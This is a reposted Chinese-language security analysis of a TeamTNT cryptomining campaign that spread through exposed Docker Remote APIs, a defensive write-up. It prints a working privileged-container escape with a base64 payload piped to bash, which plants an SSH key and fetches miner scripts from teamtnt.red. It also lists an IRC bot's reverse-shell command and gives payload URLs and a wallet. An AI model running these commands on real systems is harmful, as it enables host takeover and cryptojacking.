主頁 >  其他 > 再次捕獲云上在野容器攻擊,TeamTNT黑產攻擊方法揭秘

再次捕獲云上在野容器攻擊,TeamTNT黑產攻擊方法揭秘

2021-10-22 07:09:04 其他

一、背景

騰訊安全云鼎實驗室持續監控云原生在野攻擊威脅態勢,繼DockerHub發現百萬下載量黑產鏡像(詳見文章DockerHub再現百萬下載量黑產鏡像,小心你的容器被挖礦)之后,近期實驗室最新捕獲到TeamTNT黑客團隊新型在野容器攻擊活動,相比之前TeamTNT挖礦木馬,此次新型攻擊手法對原挖礦木馬進行了升級,并利用容器環境進行感染傳播,

通過對TeamTNT新型容器攻擊樣本詳細分析,我們發現挖礦病毒是通過掃描docker remote api未授權訪問漏洞進行傳播,相比之前TeamTNT黑客團隊出的挖礦木馬,此次對原挖礦木馬進行了升級,在進行感染時使用了新的策略,入侵后會先進行清理其他挖礦,并使用新的隱藏行程方法,入侵完畢后會清理痕跡,覆寫系統日志以逃避排查,為增加挖礦木馬植入的成功率還有備用挖礦程式,增加木馬的穩定性,利用nohup命令不掛斷地運行挖礦,并且在使用LKM rootkit技術隱藏行程,

該樣本屬于最新版本TEAMTNT樣本,被云鼎實驗室哨兵系統(云上分布式蜜罐和沙箱)第一時間捕獲,本文將會使用ATT&CK矩陣溯源分析樣本在入侵、持久化、容器逃逸等完整攻擊路徑,為大家清晰還原黑客攻擊手法和全貌,

二、樣本產生時間與流行分析

樣本的開發時間大約在2021年09月14日撰寫完畢,云鼎實驗室哨兵系統在9月14號第一時間捕獲,并進行了詳細的分析,

哨兵捕獲的網路包:

樣本流行程度:

通過哨兵智能情報統計系統,樣本在剛剛爆發的2周內較為流行,隨后感染率持續下降,

三、樣本att&ck矩陣分析

TEAMTNT的新樣本通過docker remote API傳播,程序中使用了 特權容器,容器逃逸,LKM rootkit 等先進攻擊方式,下面是對于整個攻擊程序的ATT&CK矩陣,

下圖為攻擊流程,我們將整個程序分為五個部分講解:1、初始化訪問與對外掃描 2、執行3、權限提升-容器逃逸 4、攻擊持久化 5、防御繞過

3.1 攻擊向量-初始訪問與橫向掃描—Remote API 漏洞:

DockerRemote API :是一個取代遠程命令列界面(rcli)的REST API,默認系結2375埠,Docker Remote API如配置不當可導致未授權訪問,攻擊者利用 docker client 或者 http 直接請求就可以訪問這個 API,可能導致敏感資訊泄露,黑客也可以洗掉Docker上的資料,攻擊者可進一步利用Docker自身特性,直接訪問宿主機上的敏感資訊,或對敏感檔案進行修改,最終完全控制服務器,

A、掃描獲取docker API版本

呼叫masscan 和 zgrab掃描目標IP,通過請求舊版本的命令,可以獲取到最新的docker API版本,

通常獲取1.16版本,會回傳如下資訊:

Handler for GET /v1.16/version returned error: client version 1.16 is too old. Minimum supported API version is 1.24, please upgrade your client to a newer version

相關代碼如下:

B、利用Remote API漏洞:

直接通過Remote API漏洞,遠程啟動傳播病毒的容器鏡像 alpineos/dockerapi,容器使用完成后會自動清除容器內部的檔案系統,啟動alpine 容器進行容器逃逸,

通過騰訊云容器安全服務TCSS發現存在Remote API未授權訪問風險節點和詳細資訊:

3.2 攻擊向量-執行:

在目標機器上的命令執行通過特權容器執行惡意指令,進行挖礦和病毒傳播,

A、惡意鏡像alpineos/dockerapi:

經查詢,alpineos帳號注冊時間為2021年5月26日,其中alpineos/dockerapi鏡像更新時間為截止目前已有一個月,大約有7600臺主機被感染,

通過騰訊云容器安全服務TCSS對該鏡像進行掃描,發現該鏡像存在木馬病毒,掃描結果如下圖:

鏡像啟動時會執行名為pause的腳本,pause腳本用于病毒的傳播,

B、鏡像Alpine

正規白鏡像,鏡像大小只有5M,方便下載,teamTNT使用這個鏡像進行容器逃逸,

3.3攻擊向量-權限提升----Docker逃逸:

TEAMTNT 使用的逃逸方法是特權模式+SSH

特權模式在6.0版本的時候被引入Docker,其核心作用是允許容器內的root擁有外部物理機的root權限,而此前在容器內的root用戶只有外部物理機普通用戶的權限,

使用特權模式啟動容器后(docker run --privileged),Docker容器被允許可以訪問主機上的所有設備、可以獲取大量設備檔案的訪問權限,

TEAMTNT 病毒容器運行的逃逸命令如下:

docker -H $D_TARGET run -d --privileged --net host -v /:/host alpine

chroot /host bash -c 'echo c3NoLWtleWdlbiAtTiAiIiAtZiAvdG1wL1RlYW1UTlQKCmNoYXR0ciAtUiAtaWEgL3Jvb3QvLnNzaC8gMj4vZGV2L251bGw7IHRudHJlY2h0IC1SIC1pYSAvcm9vdC8uc3NoLyAyPi9kZXYvbnVsbDsgaWNoZGFyZiAtUiAtaWEgL3Jvb3QvLnNzaC8gMj4vZGV2L251bGwKY2F0IC90bXAvVGVhbVROVC5wdWIgPj4gL3Jvb3QvLnNzaC9hdXRob3JpemVkX2tleXMKY2F0IC90bXAvVGVhbVROVC5wdWIgPiAvcm9vdC8uc3NoL2F1dGhvcml6ZWRfa2V5czIKcm0gLWYgL3RtcC9UZWFtVE5ULnB1YgoKCnNzaCAtb1N0cmljdEhvc3RLZXlDaGVja2luZz1ubyAtb0JhdGNoTW9kZT15ZXMgLW9Db25uZWN0VGltZW91dD01IC1pIC90bXAvVGVhbVROVCByb290QDEyNy4wLjAuMSAiKGN1cmwgaHR0cDovL3RlYW10bnQucmVkL3NoL3NldHVwL21vbmVyb29jZWFuX21pbmVyLnNofHxjZDEgaHR0cDovL3RlYW10bnQucmVkL3NoL3NldHVwL21vbmVyb29jZWFuX21pbmVyLnNofHx3Z2V0IC1xIC1PLSBodHRwOi8vdGVhbXRudC5yZWQvc2gvc2V0dXAvbW9uZXJvb2NlYW5fbWluZXIuc2h8fHdkMSAtcSAtTy0gaHR0cDovL3RlYW10bnQucmVkL3NoL3NldHVwL21vbmVyb29jZWFuX21pbmVyLnNoKXxiYXNoIgoKcm0gLWYgL3RtcC9UZWFtVE5UCgo= | base64 -d | bash'

第一步:創建特權容器

docker -H $D_TARGET run -d --privileged --net host -v /:/host alpine

容器本身為干凈的alpine容器,

第二步:SSH容器逃逸

在root目錄下 拷貝ssh密鑰到宿主機,通過訪問127.0.0.1 從而進行容器逃逸,

上述代碼解密后如下:

逃逸后,可以在宿主機上下載moneroocean_miner.sh等腳本進行挖礦,

3.4攻擊向量-防御繞過----清理痕跡與行程隱藏:

在植入挖礦病毒后,會通過diamorphine.sh來隱藏行程,之后清理痕跡,

A、通過diamorphine.sh 隱藏行程:

從github.com/m0nad/Diamorphine下載安裝編譯Diamorphine,加載內核模塊dia.ko,

Diamorphine是一個LKM rootkit ,功能就是 行程隱藏、模塊隱藏,用戶root權限獲取,帶有Magic-prefix 開頭的檔案和目錄隱藏,

這里重點介紹一下 行程隱藏部分,

Rootkit初始化部分會hook getdents、getdents64 和kill 三個函式,其中被hook的kill 函式用于接受命令,進行行程隱藏、root等動作,

Hacked_kill 定義了3個引數,31 用來隱藏行程,64用來獲取root,63用來隱藏自身模塊,

被hook的kill代碼如下:

通過 for_each_process遍歷行程串列找到目標行程,把行程標志設定為PF_INVISIBLE 從而達到隱藏行程的目標,

Find_task代碼如下:

通過kill命令的31信號隱藏挖礦行程(xmrig),并清理記錄

B、痕跡清理

清除命令歷史記錄:

通過洗掉/bash_history 和 執行history -c 命令,清除命令歷史記錄,

清除wtmp,secure、cron 和mail 日志,

C、ld.so.preload清理模塊

ld.so.preload清理模塊使用了base64編碼,解密后可以看到以下功能,

檢查/etc/ld.so.preload預加載檔案,洗掉空的ld.so.preload檔案,如果ld.so.preload有預加載程式,則對其進行清理,

為了能成功洗掉,重新寫了檔案洗掉函式,檔案洗掉函式中使用了chattr和intrecht、ichdarf三個命令,這三個命令實為同一種功能,TeamTNT黑客團隊曾經在入侵時,重命名過系統命令,為能成功執行,系統命令和重命名過的命令一起執行,以提高成功率,

3.5攻擊向量—持久化—釋放遠控

TEAMTNT會下載Chimaera IRC 遠控木馬,木馬沒有加殼,功能較為豐富,這里不做過多介紹,

相關命令和描述如下圖所示:

整理后如下表所示:

Command

Description (from the binary)

NICK <nick>

Changes the nick of the client

SERVER <server>

Changes servers

GETSPOOFS

Gets the current spoofing

SPOOFS <subnet>

Changes spoofing to a subnet

DISABLE

Disables all packeting from this client

ENABLE

Enables all packeting from this client

GET <http address> <save as>

Downloads a file off the web and saves it onto the hd

UPDATE <http address> <src:bin>

Update this bot

HACKPKG <http address> <bin name>

HackPkg is here! Install a bin, using http, no depends!

VERSION

Requests version of client

HELP

Displays this

IRC <command>

Sends this command to the server

SH <command>

Executes a command

ISH <command>

SH, interactive, sends to channel

SHD <command>

Executes a pseudo-daemonized command

GETBB <tftp server>

Get a proper busybox

INSTALL <http server/file_name>

Download & install a binary to /var/bin

BASH <cmd>

Execute commands using bash.

BINUPDATE <http:server/package>

Update a binary in /var/bin via wget

SCAN <nmap options>

Call the nmap wrapper script and scan with your opts.

RSHELL <server> <port>

Equates to nohup nc ip port -e /bin/sh

LOCKUP <http:server>

Kill telnet, d/l aes backdoor from <server>, run that instead.

GETSSH <http:server/dropbearmulti>

D/l, install, configure and start dropbear on port 30022

TOETEDENCLIENT

Kill client

UPDATE

update

四、挖礦部分分析

Moneroocean.sh腳本主要用來挖礦:

更改linux最大檔案句柄數的限制,以提高穩定性,并配置防火墻,放行資料包,

清理動態預加載預加載ld.preload,木馬通常使用使用此技術來隱藏木馬檔案,可以實作劫持,TeamTNT團隊的新挖礦程式,清理了此加載檔案,更換隱藏技術,并且可以排除其他挖礦程式,以達到資源獨占,清理模塊使用了base64編碼,上文有進一步分析,

清理其他部分主流挖礦域名:

還原ps命令,并清理定時任務,有些挖礦木馬存在修改系統命令:

清理痕跡,清空系統日志,腳本最后有呼叫,

清理其他挖礦程式,簡單粗暴判定CPU占用65%以上的都為挖礦程式,并結束行程,以達到資源獨占的目的,

實作下載功能,實作類似wget curl功能,用于下載wget curl:

檢查系統中是否有curl,如果沒有則從自己服務器上下載curl程式:

下載錢包檔案,并準備兩個挖礦安裝包,其中一個為備用安裝包:

中止原有的的挖礦程式,下載新版挖礦木馬后重命名,并解壓后洗掉安裝包

檢測挖礦程式是否正常作業,如果被破壞則下載備用挖礦程式,解壓后洗掉安裝包

設定挖礦密碼,把用戶錢包,密碼,礦池地址寫入組態檔,并重命名為“config_background.json”,

創建miner.sh腳本,把腳本寫入.profile,以便在登陸時在后臺運行,

修改大頁記憶體hugepages值,以提高挖礦效率,

創建挖礦服務,服務名為“SystemRaid.service”,

增加挖礦木馬的健壯性,將挖礦程式在后臺運行,

清理痕跡并通過執行diamorphine.sh來隱藏行程,

挖礦資訊總結:

礦池:dl.chimaera.cc:21582

錢包:89sp1qMoognSAbJTprreTXXUv9RG1AJBRjZ3CFg4rn6afQ5hRuqxiWRivYNqZbnYKKdsH5pCiTffrZToSyzXRfMvSHx5Guq

首選挖礦程式:http://teamtnt.red/sh/bin/xmrig/x86_64/mo.tar.gz

備用挖礦程式:https://github.com/xmrig/xmrig/releases/download/v6.15.0/xmrig-6.15.0-linux-static-x64.tar.gz

URL:http://teamtnt.red/sh/setup/moneroocean_miner.sh;http://teamtnt.red/sh/setup/diamorphine.sh

五、如何防御

騰訊安全持續在容器安全上進行投入和相關研究,構建了完整的容器安全防護和服務保障體系,針對容器環境下的安全問題,騰訊云容器安全服務通過資產管理、鏡像安全、運行時安全、安全基線四大核心能力來保障容器的全生命周期安全,為企業提供鏡像掃描、運行時安全檢測(容器逃逸、反彈shell、檔案查殺)、高級防御(例外行程攔截、檔案篡改保護、高危系統呼叫監控)、安全基線檢測、資產管理一站式容器安全防護,容器安全服務已集成騰訊云鼎實驗室最新容器安全情報,可第一時間檢測黑產容器鏡像,并針對新型在野攻擊進行有效防御,企業可通過容器安全服務及時發現容器安全風險并快速構建容器安全防護體系,

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/330095.html

標籤:其他

上一篇:OpenCV-Python影像模糊處理

下一篇:[網鼎杯 2020 朱雀組]之phpweb兩種不同的解題方式

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • 2023年最新微信小程式抓包教程

    01 開門見山 隔一個月發一篇文章,不過分。 首先回顧一下《微信系結手機號資料庫被脫庫事件》,我也是第一時間得知了這個訊息,然后跟蹤了整件事情的經過。下面是這起事件的相關截圖以及近日流出的一萬條資料樣本: 個人認為這件事也沒什么,還不如關注一下之前45億快遞資料查詢渠道疑似在近日復活的訊息。 訊息是 ......

    uj5u.com 2023-04-20 08:48:24 more
  • web3 產品介紹:metamask 錢包 使用最多的瀏覽器插件錢包

    Metamask錢包是一種基于區塊鏈技術的數字貨幣錢包,它允許用戶在安全、便捷的環境下管理自己的加密資產。Metamask錢包是以太坊生態系統中最流行的錢包之一,它具有易于使用、安全性高和功能強大等優點。 本文將詳細介紹Metamask錢包的功能和使用方法。 一、 Metamask錢包的功能 數字資 ......

    uj5u.com 2023-04-20 08:47:46 more
  • vulnhub_Earth

    前言 靶機地址->>>vulnhub_Earth 攻擊機ip:192.168.20.121 靶機ip:192.168.20.122 參考文章 https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html https://www.cnb ......

    uj5u.com 2023-04-20 07:46:20 more
  • 從4k到42k,軟體測驗工程師的漲薪史,給我看哭了

    清明節一過,盲猜大家已經無心上班,在數著日子準備過五一,但一想到銀行卡里的余額……瞬間心情就不美麗了。最近,2023年高校畢業生就業調查顯示,本科畢業月平均起薪為5825元。調查一出,便有很多同學表示自己又被平均了。看著這一資料,不免讓人想到前不久中國青年報的一項調查:近六成大學生認為畢業10年內會 ......

    uj5u.com 2023-04-20 07:44:00 more
  • 最新版本 Stable Diffusion 開源 AI 繪畫工具之中文自動提詞篇

    🎈 標簽生成器 由于輸入正向提示詞 prompt 和反向提示詞 negative prompt 都是使用英文,所以對學習母語的我們非常不友好 使用網址:https://tinygeeker.github.io/p/ai-prompt-generator 這個網址是為了讓大家在使用 AI 繪畫的時候 ......

    uj5u.com 2023-04-20 07:43:36 more
  • 漫談前端自動化測驗演進之路及測驗工具分析

    隨著前端技術的不斷發展和應用程式的日益復雜,前端自動化測驗也在不斷演進。隨著 Web 應用程式變得越來越復雜,自動化測驗的需求也越來越高。如今,自動化測驗已經成為 Web 應用程式開發程序中不可或缺的一部分,它們可以幫助開發人員更快地發現和修復錯誤,提高應用程式的性能和可靠性。 ......

    uj5u.com 2023-04-20 07:43:16 more
  • CANN開發實踐:4個DVPP記憶體問題的典型案例解讀

    摘要:由于DVPP媒體資料處理功能對存放輸入、輸出資料的記憶體有更高的要求(例如,記憶體首地址128位元組對齊),因此需呼叫專用的記憶體申請介面,那么本期就分享幾個關于DVPP記憶體問題的典型案例,并給出原因分析及解決方法。 本文分享自華為云社區《FAQ_DVPP記憶體問題案例》,作者:昇騰CANN。 DVPP ......

    uj5u.com 2023-04-20 07:43:03 more
  • msf學習

    msf學習 以kali自帶的msf為例 一、msf核心模塊與功能 msf模塊都放在/usr/share/metasploit-framework/modules目錄下 1、auxiliary 輔助模塊,輔助滲透(埠掃描、登錄密碼爆破、漏洞驗證等) 2、encoders 編碼器模塊,主要包含各種編碼 ......

    uj5u.com 2023-04-20 07:42:59 more
  • Halcon軟體安裝與界面簡介

    1. 下載Halcon17版本到到本地 2. 雙擊安裝包后 3. 步驟如下 1.2 Halcon軟體安裝 界面分為四大塊 1. Halcon的五個助手 1) 影像采集助手:與相機連接,設定相機引數,采集影像 2) 標定助手:九點標定或是其它的標定,生成標定檔案及內參外參,可以將像素單位轉換為長度單位 ......

    uj5u.com 2023-04-20 07:42:17 more
  • 在MacOS下使用Unity3D開發游戲

    第一次發博客,先發一下我的游戲開發環境吧。 去年2月份買了一臺MacBookPro2021 M1pro(以下簡稱mbp),這一年來一直在用mbp開發游戲。我大致分享一下我的開發工具以及使用體驗。 1、Unity 官網鏈接: https://unity.cn/releases 我一般使用的Apple ......

    uj5u.com 2023-04-20 07:40:19 more